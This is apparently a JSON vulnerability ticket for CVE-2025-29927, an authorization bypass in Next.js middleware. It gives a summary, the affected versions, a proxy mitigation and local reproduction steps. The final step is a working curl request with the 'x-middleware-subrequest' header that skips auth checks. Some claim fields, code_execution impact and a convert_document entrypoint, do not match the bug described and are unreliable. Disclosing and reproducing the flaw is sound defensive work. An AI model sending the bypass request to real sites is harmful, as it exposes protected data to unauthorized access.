{
  "claim": {
    "argus_claim_ref": null,
    "attacker_control": null,
    "claimed_surface": "library_api",
    "expected_impact": "code_execution",
    "finding_id": null,
    "id": null,
    "required_entrypoint_detail": null,
    "required_entrypoint_kind": "convert_document",
    "submission_reason": "ticket_derived",
    "trigger_class": null,
    "upstream_verdicts": null
  },
  "latest_description": "## Summary\nNext.js middleware authorization checks can be skipped when a request includes the internal `x-middleware-subrequest` header, enabling attackers to reach protected routes without passing middleware-based access control. This affects self-hosted deployments that rely on middleware for authorization checks.\n\n## Affected Package\n- **Name:** next\n- **Ecosystem:** npm\n- **Vulnerable versions:** >=11.1.4 <12.3.5, >=13.0.0 <13.5.9, >=14.0 <14.2.25, >=15.0 <15.2.3\n- **Patched versions:** 12.3.5, 13.5.9, 14.2.25, 15.2.3\n\n## Details\nNext.js uses the internal `x-middleware-subrequest` header to prevent recursive middleware execution. In vulnerable versions, external requests that include this header can cause middleware to be skipped entirely. If an application relies on middleware for authorization (e.g., validating auth cookies or enforcing access control), an attacker can craft a request with this header to bypass checks and access protected resources.\n\nSelf-hosted Next.js applications running via `next start` with `output: 'standalone'` are affected. Deployments hosted on Vercel are automatically protected. A mitigation is to block external requests containing the `x-middleware-subrequest` header at the edge or reverse proxy until patched.\n\n## Reproduction Steps\n> The following demonstrates the bypass on a vulnerable version (example: 14.2.24). Adjust version within a vulnerable range.\n\n1. **Environment setup**\n   - Install Node.js 18+ and npm.\n   - Create a Next.js app and install a vulnerable version:\n     ```bash\n     npx create-next-app@latest next-mw-bypass\n     cd next-mw-bypass\n     npm install next@14.2.24 react react-dom\n     ```\n2. **Add middleware authorization check**\n   - Create `middleware.js`:\n     ```javascript\n     import { NextResponse } from 'next/server';\n\n     export function middleware(req) {\n       const hasAuth = req.cookies.get('auth')?.value === 'ok';\n       if (!hasAuth) {\n         return new NextResponse('Unauthorized', { status: 401 });\n       }\n       return NextResponse.next();\n     }\n\n     export const config = { matcher: ['/protected'] };\n     ```\n   - Create a protected route at `app/protected/page.js` (or `pages/protected.js` for pages router):\n     ```javascript\n     export default function Protected() {\n       return <div>secret-data</div>;\n     }\n     ```\n3. **Run the app**\n   ```bash\n   npm run build\n   npm run start\n   ```\n4. **Verify normal protection**\n   ```bash\n   curl -i http://localhost:3000/protected\n   ```\n   - Expected: `401 Unauthorized` response from middleware.\n5. **Bypass middleware with the internal header**\n   ```bash\n   curl -i -H 'x-middleware-subrequest: 1' http://localhost:3000/protected\n   ```\n   - Expected (vulnerable): `200 OK` with `secret-data` despite missing auth cookie.\n\n## Indicators of Success\n- Requests without authentication are blocked by middleware (401).\n- Adding `x-middleware-subrequest` causes middleware to be skipped and the protected route returns content (200).\n\n## References\n- https://nvd.nist.gov/vuln/detail/CVE-2025-29927\n- https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw\n- http://www.openwall.com/lists/oss-security/2025/03/23/3\n- https://github.com/vercel/next.js/commit/52a078da3884efe6501613c7834a3d02a91676d2\n- https://github.com/vercel/next.js/commit/5fd3ae8f8542677c6294f32d18022731eab6fe48\n- https://github.com/kOaDT/poc-cve-2025-29927\n",
  "product": "npm:next",
  "severity": "critical",
  "status": "open",
  "summary": "Next.js middleware can be bypassed by supplying the internal x-middleware-subrequest header, allowing unauthorized access to protected routes in self-hosted deployments.",
  "ticket_id": "CVE-2025-29927"
}